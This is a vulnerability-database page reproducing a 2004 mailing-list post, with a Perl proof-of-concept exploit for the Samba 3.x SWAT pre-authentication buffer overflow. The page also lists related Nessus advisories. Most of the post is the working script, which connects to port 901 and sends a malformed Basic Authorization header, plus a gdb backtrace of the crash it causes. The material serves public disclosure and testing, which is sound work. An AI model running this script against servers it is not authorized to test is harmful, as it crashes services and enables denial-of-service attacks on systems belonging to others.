sambaPoC.txt

🗓️ 23 Jul 2004 00:00:00Reported by Noam RathausType

packetstorm🔗 packetstormsecurity.com👁 78 Views

Proof of concept exploit for Samba 3.x buffer overflow causing segmentation fault in SWAT server.

Reporter	Title	Published	Views	Family All 35
Tenable Nessus	Samba 3.0.x versions 3.0.2 through 3.0.4 Buffer Overflow	9 Jun 201600:00	–	nessus
Tenable Nessus	FreeBSD : Multiple Potential Buffer Overruns in Samba (2de14f7a-dad9-11d8-b59a-00061bc2ad93)	23 Apr 200900:00	–	nessus
Tenable Nessus	FreeBSD : Multiple Potential Buffer Overruns in Samba (173)	22 Jul 200400:00	–	nessus
Tenable Nessus	GLSA-200407-21 : Samba: Multiple buffer overflows	30 Aug 200400:00	–	nessus
Tenable Nessus	Mandrake Linux Security Advisory : samba (MDKSA-2004:071)	31 Jul 200400:00	–	nessus
Tenable Nessus	RHEL 3 : samba (RHSA-2004:259)	22 Jul 200400:00	–	nessus
Tenable Nessus	Samba SWAT 3.0.2 - 3.0.4 HTTP Basic Auth base64 Buffer Overflow	18 Nov 201100:00	–	nessus
Tenable Nessus	Slackware 10.0 / 8.1 / 9.0 / 9.1 / current : new samba packages (SSA:2004-207-01)	13 Jul 200500:00	–	nessus
Tenable Nessus	SUSE-SA:2004:022: samba	25 Jul 200400:00	–	nessus
Tenable Nessus	Samba SWAT HTTP Basic Auth base64 Overflow	22 Jul 200400:00	–	nessus

`Hi,  
  
The following is a brief proof of concept exploit code for the vulnerability   
mentioned in "Evgeny Demidov" <[email protected]>'s advisory: Samba 3.x swat   
preauthentication buffer overflow  
  
Running the perl script against a vulnerable SWAT server will cause:  
Program received signal SIGSEGV, Segmentation fault.  
[Switching to process 30853]  
0x410957af in memcpy () from /lib/tls/libc.so.6  
(gdb) bt  
#0 0x410957af in memcpy () from /lib/tls/libc.so.6  
#1 0xbffff340 in ?? ()  
#2 0x00000001 in ?? ()  
#3 0x080e34e7 in ?? ()  
#4 0xbffff5e5 in ?? ()  
#5 0x082919a0 in ?? ()  
#6 0xffffffff in ?? ()  
#7 0x080e08f0 in ?? ()  
#8 0x082919a0 in ?? ()  
#9 0xffffffff in ?? ()  
#10 0x080e7090 in ?? ()  
#11 0x0c0b8fae in ?? ()  
#12 0xbffff5e5 in ?? ()  
#13 0x00000000 in ?? ()  
#14 0xbffff5a8 in ?? ()  
#15 0x0806c97d in ?? ()  
#16 0xbffff5e5 in ?? ()  
#17 0x0815fd76 in ?? ()  
#18 0x00000006 in ?? ()  
#19 0x41150ebc in ?? () from /lib/tls/libc.so.6  
#20 0x081c8480 in ?? ()  
#21 0x4108ae2f in _IO_list_resetlock () from /lib/tls/libc.so.6  
#22 0xbffff3b4 in ?? ()  
#23 0x081c8480 in ?? ()  
#24 0x081c887f in ?? ()  
#25 0x00000000 in ?? ()  
#26 0x00000000 in ?? ()  
#27 0xbffff3b4 in ?? ()  
#28 0xbffff4cc in ?? ()  
#29 0x00000400 in ?? ()  
#30 0x4108dda4 in mallopt () from /lib/tls/libc.so.6  
#31 0xbffff3b4 in ?? ()  
#32 0x08162fd9 in ?? ()  
#33 0x41151888 in __after_morecore_hook () from /lib/tls/libc.so.6  
#34 0x4108e3c8 in mallopt () from /lib/tls/libc.so.6  
#35 0x00000000 in ?? ()  
  
  
Exploit:  
#!/usr/bin/perl  
# Samba 3.0.4 and prior's SWAT Authorization Buffer Overflow  
# Created by Noam Rathaus of Beyond Security Ltd.  
#  
  
use IO::Socket;  
use strict;  
  
my $host = $ARGV[0];  
  
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,   
PeerPort => "901" );  
  
unless ($remote) { die "cannot connect to http daemon on $host" }  
  
print "connected\n";  
  
$remote->autoflush(1);  
  
my $http = "GET / HTTP/1.1\r  
Host: $host:901\r  
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712   
Firefox/0.9.1\r  
Accept: text/xml\r  
Accept-Language: en-us,en;q=0.5\r  
Accept-Encoding: gzip,deflate\r  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r  
Keep-Alive: 300\r  
Connection: keep-alive\r  
Authorization: Basic =\r  
\r  
";  
  
print "HTTP: [$http]\n";  
print $remote $http;  
sleep(1);  
print "Sent\n";  
  
while (<$remote>)  
{  
&nbsp;print $_;  
}  
print "\n";  
  
close $remote;  
  
--   
Thanks  
Noam Rathaus  
CTO  
Beyond Security Ltd.  
  
Join the SecuriTeam community on Orkut:  
http://www.orkut.com/Community.aspx?cmm=44441  
`

23 Jul 2004 00:00Current

6.4Medium risk

Vulners AI Score6.4

EPSS0.59614